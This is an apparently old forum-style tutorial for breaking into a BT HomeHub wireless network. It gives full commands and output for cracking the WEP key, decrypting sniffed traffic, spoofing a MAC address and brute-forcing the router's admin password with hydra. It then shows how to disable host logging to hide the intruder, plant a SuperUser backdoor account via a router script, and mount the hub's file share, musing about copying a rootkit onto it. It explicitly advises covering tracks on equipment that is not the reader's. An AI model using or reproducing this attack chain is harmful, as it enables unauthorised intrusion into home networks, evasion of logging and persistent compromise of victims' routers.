HACKING A BT-HOME-HUB

(WEP WEP OPN 64 "DEFAULT")

101
DISCLAIMER 1).This guide should not be used illegally, 2)There is no warranty or responsibility associated with this guide or to the author, 3).You accept sole responsibility for your actions.

This is my first full hacking guide, so i hope you like it and it works for you in your test lab!, if you find a better way to achieve the goals in this guide then please let me no via the forum.

HACKING A HOMEHUB The Setup

What is our goal?
Should we just collect the AP key to prove we can? or should go all the way!

In order to gain access to the network we need to get the access key, and to do this we are going to use a number of tools, the quickest way to collect them all is by downloading the backtrack live CD. LIVECD : Backtrack.iso Version Latest (Final) 3 at time of writing.

Once you have downloaded the ISO burn it to CD and reboot using the CD and when you are in and at a desktop ;) continue with this guide. Are you ready?, login, Fire up X, open us a console or 3 and lets get started.

HACKING A HOMEHUB Invaders in our Homes

In order to find our target network details first we need to execute "airodump-ng" with default channel jumping. airodump-ng -w CAPTURE wlan0 This command will create a file called CAPTURE.cap and CAPTURE.txt. CAPTURE.txt will contain readable output such as the ESSID and any other MAC's, while the CAPTURE.cap file contains the packets collected while airodumpng is sniffing traffic. Once the access points information has been collected airodump-ng can be reconfigured to collect just the packet on the network we need. airodump-ng -w /tmp/myhomehub --channel 6 --bssid 00:18:F6:0B:00:5D wlan0
CH 6 ][ Elapsed: 52 mins ][ 2008-06-27 02:15 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:F6:0B:00:5D 217 100 30617 32163 31 6 48 WEP WEP OPN BTHomeHub-9AC1 BSSID STATION PWR Lost Packets Probes 00:18:F6:0B:00:5D 00:00:00:00:00:C1 219 72 29877

Now we have airodump-ng collecting packets on channel 6 while filtering out any other AP that maybe on the same channel by using this bssid option. This will help keep the file size lower and help my poor little D500 and DWL650 keep up. Ok so we are all set capturing the packets that are sent over this network, but its all encrypted using a KEY so we need to get this KEY if we are to go any further than just sniffing, this is achieved by sniffing for a weak packet and generating a larger number of the weak packets for the cracking process, there are a number of way to achieve this but the one we are going to use is a very simple and effective method for testing against a default BTHomeHub with at least one wireless client ;) aireplay-ng -3 -b 00:18:F6:0B:00:5D -h 00:00:00:00:00:C1 wlan0
The interface MAC (01:01:01:01:01:01) doesn't match the specified MAC (-h). ifconfig wlan0 hw ether 00:00:00:00:00:C1 Saving ARP requests in replay_arp-0712-012732.cap You should also start airodump-ng to capture replies. Read 167179 packets (got 45379 ARP requests), sent 544876 packets...(148 pps)

What should now begin to happen is that the #DATA count for your target network should start to increase quicker and quicker until you are pushing around 100+ packets per second at the AP, this in turn will cause the AP to generate the weak packet that can be collected and cracked using aircrack-ng. aircrack-ng -n 64 -z /tmp/myhomehub-01.cap
Aircrack-ng 0.9.1 [00:01:08] Tested 80/140000 keys (got 30153 IVs) KB depth byte(vote) 0 0/ 1 16( 173) 3D( 155) 94( 147) 25( 146) 03( 143) 66( 143) 55( 142) 5C( 141) 09( 138) 56( 138) F8( 138) EC( 137) 4B( 136) 1 6/ 8 88( 145) 82( 144) F4( 144) 44( 143) 0E( 142) D8( 142) 81( 139) 07( 138) 1D( 136) 73( 136) 80( 136) 87( 136) F6( 136) 2 0/ 1 D5( 165) 59( 147) 6A( 144) 98( 144) 32( 142) 89( 142) 5D( 141) 74( 140) 1B( 139) 69( 139) 80( 139) 9E( 138) 66( 137) 3 0/ 1 94( 179) 4F( 146) 10( 143) E0( 143) 0A( 142) C7( 139) F1( 139) 1E( 138) 4A( 138) 54( 137) 5F( 137) AB( 137) 02( 136) 4 0/ 10 71( 145) 8D( 143) D1( 141) 39( 140) 76( 140) C0( 140) CA( 139) 72( 138) 7C( 138) 15( 137) 03( 136) 42( 136) 47( 136) 5 0/ 1 74( 153) 37( 146) 5F( 141) 6F( 141) CE( 138) DD( 137) 90( 136) CD( 136) D3( 136) 24( 135) 45( 134) 94( 134) C6( 134) KEY FOUND! [ 10:6A:5F:51:A1 ]

To crack the key you are going to need a larger amount of weak packets while creating this guide the sniffing process took over 50 minutes and captured over 30000 weak packets. Once the process is complete you can stop [CTRL+C] airodump-ng and aireplay-ng as we have the key to authenticate to the network.

HACKING A HOMEHUB Behold the KEY

Now we could just connect to the network blind but that would not be a wise move?, we have just spent 50 + minutes sniffing encrypted traffic from the target network and the best thing we can do with the KEY we just cracked is to see what all those packets have in them, now remember that we made a lot of them, but other clients may have also used the network and as such the data is always worth a look at. airdecap-ng -b 00:18:F6:0B:00:5D -w 10:6A:5F:51:A1 /tmp/myhomehub-01.cap
Total number of packets read Total number of WEP data packets Total number of WPA data packets Number of plaintext data packets Number of decrypted WEP packets 61918 61461 0 0 61461

As you can see we have decrypted all the WEP data packets and can have a look inside to see what we can find within the captured data. ethereal /tmp/myhomehub-01-dec.cap Once ethereal has loaded the packets we decrypted we can start to identify useful information about the network, its hosts and services that may be available. Inside the main window there should be lists of IP address and Host names under the [Source] and [Destination] tab mine included the following: 192.168.1.253, api.home, 192.168.1.254, 192.168.1.64 This give us some idea about Hosts on the network and some IP's we can scan for services or entry points in to them. ;) this time all the information i could find is hosts, but this is always a good place to start after getting a working KEY as there might be all kinds of useful information within the collected and decrypted data, such as passwords to the AP admin interface, so its always worth having a read about using the options in ethereal as you can create filters to locate most of this information without any more interaction than is needed with the network and you will end up with some hosts to target next. We have a KEY and have checked the decrypted data we can connect to the network, this step is going to leave information about you in the logs and yes by default the HomeHub logs connections and has a page to display connected hosts.You will be on this after connecting to the network so get into gear before someone view's the page ifconfig wlan0 down iwconfig wlan0 mode managed essid BTHomeHub-9AC1 channel 6 key 10:6A:5F:51:A1 ifconfig wlan0 up dhcpcd wlan0 ifconfig wlan0 | grep inet
inet addr:192.168.1.65 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: ee86::221:1fc:f301:122/64 Scope:Link

This indicates that we are connected and have an IP address within the range identified from the packet capture and decryption.

HACKING A HOMEHUB The Secrets of the Hub

So now we are connected and can see the other host the main goal at the moment is to gain access to the AP from and ADMIN interface, HTTP(s), TELNET, SSH or similar and remove the recorded information about the machine we are using. First we might test the hosts found with a simple ping to the host name or IP's that we collected ping 192.168.1.254 ping 192.168.1.253 ping 192.168.1.64 ping api.home As you can see when we ping api.home the IP associated to that host name is 192.168.1.254 so lets take a closer look at what this host has to offer. nmap -sV --version-light api.home Once the scan is complete you will see an entire call "Service Info: Device: broadband router" so this is the router and now we can check what kind of services it offers.
Interesting ports on api.home (192.168.1.254): (The 1667 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE VERSION 21/tcp open ftp Alcatel Speedtouch aDSL router ftpd 23/tcp open telnet Alcatel/Thomson SpeedTouch DSL router admin interface 80/tcp open http? 443/tcp open tcpwrapped 1723/tcp open pptp? 5060/tcp closed sip 8080/tcp closed http-proxy

Now we have some PORTS on the router that offer some kind of service, the first one to check should be HTTP as most router will give up some info without any password, and the HomeHub is one of them,
"with a little magic you will discover more, so much more! ;)".

HACKING A HOMEHUB The Quest for Power

Fire up a web browser and enter api.home in the address bar or the .254 IP, Got the page? good now scroll to the bottom, do you see the "My home network" part?

mac-changer works, but you can't rely on it, find a card that lets you change the MAC in the firmware to keep the change forever

Under Wireless can you spot your host name or mac address!... You have been LOGGED! good news is that you can remove this entire! in fact you can even disable the service that will do this every time your machine makes a noise , all you need is an account on the router that has the access right needed to modify services! If we use Google to find more information about the HomeHub you will stumble across quite a lot of useful information such as there is an admin account and the hub may be vulnerable to "Double-slash Authentication Bypass", but lets just take the fact that the "admin" account is valid and try to obtain the password! We could sniff the traffic and filter the capture for HTTP base authentication but waiting for a user to authenticate maybe pointless, as most will never connect so long as something is displayed in the web browser!, but in this guide i would like to demonstrate "hydra". We have our target host, api.home, we have a user name, admin, there should be a password file included with Back|Track, if you ant got one find one or make one! cat /pentest/password/dictionaries/wordlist.txt If we start to build a list a requirements we can soon fill them, all we need is a protected URL? Well there is a nice little tool called list-urls.py and providing it with the URL http://api.home reveals a number of links within the main page such as the one used below to brute force a password for the admin account ;). ./list-urls.py http://api.home
########################################################## # # # Extract URLS from a web page # # muts@whitehat.co.il # # # ########################################################## / / javascript:GoAndRemember('/cgi/b/bb/','') javascript:GoAndRemember('/cgi/b/telephony/','') https://service.btbroadbandvoice.bt.com/selfcare/consumerYourAccount javascript:GoAndRemember('/cgi/b/telephony/', '') javascript:GoAndRemember('/cgi/b/lan/','')

hydra api.home http-get -l admin -P /wordlist.txt -t 10 -f -m http://api.home/cgi/b/telephony/

Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2003-07-13 05:53:48 [DATA] 2 tasks, 1 servers, 8 login tries (l:1/p:8), ~4 tries per task [DATA] attacking service http-get on port 80 [80][www] host: api.home login: admin password: admin [STATUS] attack finished for api.home (valid pair found) Hydra (http://www.thc.org) finished at 2003-07-13 05:53:52

So now you no the secret default password to all BT HomeHub and you can use hydra in other situations!

HACKING A HOMEHUB What Lies Beneath

Now we need to remove the LOGGED information about our machine so let login to the web interface at "http://api.home" under the "advanced" link click "Continue to advanced ..." and provide the admin:admin authentication credentials we obtained.

Follow the ".Devices" link to view the list, you will be able to click "edit" or "delete", however once you click this and your details are removed you may find your self listed again by pressing [F5] to refresh your browser! so now you have a problem and need to find the solution!.

Lets think for a minute? what are the services listed during our port scan? "telnet" was there on port "23" let take a look and see if the admin account works there! telnet api.home
Trying 192.168.1.254... Connected to api.home. Escape character is '^]'. Username : admin Password : ***** ______ BT Home Hub ___/_____/\ / /\\ 6.2.2.6 _____/__ / \\ _/ /\_____/___ \ Copyright (c) 1999-2006, THOMSON // / \ /\ \ _______//_______/ \ / _\/______ / /\ \ / // /\ __/ / \ \ / // / _\__ // / \_______\/ / / / / /\ /_/______/___________________/ /________/ /___/ \ \ \ \ ___________ \ \ \\ \ / \_\ \ / /\ \ \ \ \___\/ \ \/ / \ \\ \ / \_____/ / \ \ \________\/ /__________/ \ \ / \ _____ \ /_____\/ \ / /\ \ /___\/ /____/ \ \ / \ \ /___\/ \____\/ -----------------------------------------------------------------------_{admin}=> ?

Like most things in life there is going to be a manual! where could one be?, well the first thing to try might be Google but more closer to home you might just type "?", Following commands are available :
help menu ? exit .. saveall ping traceroute : Displays this help information : Displays menu : Displays this help information : Exits this shell. : Exits group selection. : Saves current configuration. : Send ICMP ECHO_REQUEST packets. : Send ICMP/UDP packets to trace the ip path.

Following command groups are available : firewall dyndns debug igmp mlp sntp upnp service connection dns dsd eth atm adsl config env grp hostmgr ids interface ip language memm nat ppp pptp script software system systemlog tls wireless

From this help information we can launch a menu or continue to just enter the commands via the CLI
{admin}=>menu

HACKING A HOMEHUB The Quieter you become

Now in the list of possible options there should be "hostmgr" have a look and see what you can do. you might want to list the host's.
{admin}=>hostmgr list MAC-address IP-address Flags Type Intf Hw Intf Hostname

Can you see your details in the listing! well you might like to try and remove them using the "delete" command
{admin}=>hostmgr delete mac_addr YOU:MAC:HERE

however you will still end up being listed so what else can we do? wait a minute we can set the state of the hostmgr service! let try changing the state to disabled?
{admin}=>hostmgr config state disabled

Then remove our details using the delete command, fire up a browser and see if your listed now! try refreshing the page a few times to check.... Now you are unlisted and you have the admin password for the router, you can make changes to the network configuration and see details information about host on the network, whats the next step?, well that is up to you and as long as its your equipment your safe to do as you please. if not learn to cover your tracks. One trick might might be to gain a higher level of access!, yes the HomeHub has a SuperUser Account and you have all the tools you need to gain access to this, so get Google up and running a see what you can find?.. You might try
:script add name iwantsuperuser command ="user add name = owned password = somethingeasy role SuperUser descr =me" :script run name = iwantsuperuser pars=""

If all went well you have now created a new account with SuperUser access to the router, so login using your new SuperUser account, and have a good read of any information you can Google about the router, scripts, accounts etc... the BTHomeHub is now owned whats the next step? well you have now got access to the network and the routers administration console, you have disabled host logging, what more would you like? access to the clients on the network! there was one you hammered to gain access to the network in the first place! shall we take a look see? what about the other IP one down from the router could that be linked somehow?

HACKING A HOMEHUB There is always War somewhere

I guess we better fire up nmap again and take a closer look, maybe one of these devices in monitoring us? first lets give them a ping just to check there still up
ping 192.168.1.64 PING 192.168.1.64 (192.168.1.64) 56(84) bytes of data. From 192.168.1.65 icmp_seq=1 Destination Host Unreachable ping 192.168.1.254 PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data. 64 bytes from 192.168.1.254: icmp_seq=1 ttl=64 time=2.98 ms

So the .64 host was down?, there is no point running a scan lets move onto the next IP nmap -sV 192.168.1.253
PORT 139/tcp 515/tcp STATE open open SERVICE netbios-ssn printer VERSION Samba smbd (workgroup: BT) Xerox LPD

MAC Address: 02:18:F6:0B:00:5C (Unknown) Service Info: Device: printer

This looks interesting we have the same MAC address for both the .253 and .254 devices this must mean that the router has more than one interface.
MAC Address: 00:18:F6:0B:00:5C (Unknown) Service Info: Device: broadband router

Also we can see the 253 device is showing 2 services one of which is NETBIOS this is a file sharing based protocol so maybe we can connection to the remote file system? lets see what there is on the host using "smbtree" smbtree -N
BT \\THOMSON \\THOMSON\ADMIN$ \\THOMSON\IPC$ \\THOMSON\BT_7G Samba Server IPC Service (Samba Server) IPC Service (Samba Server) USB disk BT_7G

Great, lets create a mount point in our local file system mkdir /mnt/BTHUB And mount the remote share as a guest. mount -t smbfs -o guest,ip=192.168.1.253,workgroup=BT //THOMSON/BT_7G /mnt/BTHUB
ls /mnt/BTHUB/ AP-Testing-Lesson-1*

We now have a connection to the remote file system that network clients can view shall we copy a ROOTKIT onto the device just to see what we catch? or shall we just break into the last missing client, I am sure you have read enough to gain access to the last client your self, it not read this guide again because I no that you have ;)

Well here ends my guide, I hope you enjoyed the read and have gained something from it, please feel free to update and distribute were ever you see fit!